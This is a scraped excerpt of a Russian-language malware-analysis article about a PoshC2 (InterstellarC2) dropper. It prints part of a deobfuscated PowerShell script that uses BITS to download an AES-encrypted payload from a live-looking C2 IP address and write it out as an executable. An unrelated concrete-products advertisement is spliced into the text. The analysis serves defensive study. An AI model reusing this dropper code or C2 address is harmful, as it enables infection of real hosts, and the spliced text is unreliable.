Категория > Новости > InterstellarC2. Разбираем последствия заражения дроппером PoshC2 - «Новости»
InterstellarC2. Разбираем последствия заражения дроппером PoshC2 - «Новости»23-08-2023, 15:21. Автор: Клара |
PDF). Для деобфускации можно пойти несколькими путями: воспользоваться инструментом PSDecode, использовать журнал Windows при включенном аудите сценариев PowerShell, ну или попросить разобраться ChatGPT, который тоже умеет деобфусцировать, хоть иногда и меняет исходный код на свое усмотрение. Читайте также - Компания ФЭСТ ГРУПП на протяжении долгих лет является надёжным поставщиком изделий ЖБИ. Нашими клиентами являются юридические лица и частные заказчики.. Плиты ПК (ГОСТ 9561-91) - fast-grupp.ru по доступным ценам. Я воспользуюсь PSDecode. После деобфускации получаем исходный сценарий (некоторые строки я подправил вручную): Set-Variable -Namel60Yu3 -Value ([type]('System.Security.Cryptography.AesCryptoServiceProvider'))Set-Variable -NameBI34 -Value ([type]('System.Security.Cryptography.CryptoStream'))$Url = 'http://64.226.84.200/94974f08-5853-41ab-938a-ae1bd86d8e51'$PTF = "$env:temp94974f08-5853-41ab-938a-ae1bd86d8e51"Import-Module BitsTransfer Становится понятнее. Если коротко: PowerShell здесь при помощи системной службы Windows BitsTransfer (T1197 по матрице ATT&CK) данные с C2-сервера загружаются на скомпрометированный хост, после чего загруженные данные расшифровываются по алгоритму AES-CBC-128. Для расшифровки AES c CBC-mode необходимы ключ и вектор инициализации, они как раз и указаны в сценарии. Расшифрованные байты записываются в исполняемый файл Для дешифровки можем воспользоваться тем же сценарием или инструментом CyberChef (но это более трудоемкий способ). Из значения переменной infoЧтобы убедиться, что работа ведется с верным пакетом, номер пакета можно сопоставить с номером экспортируемого объекта Wireshark. Перейти обратно к новости |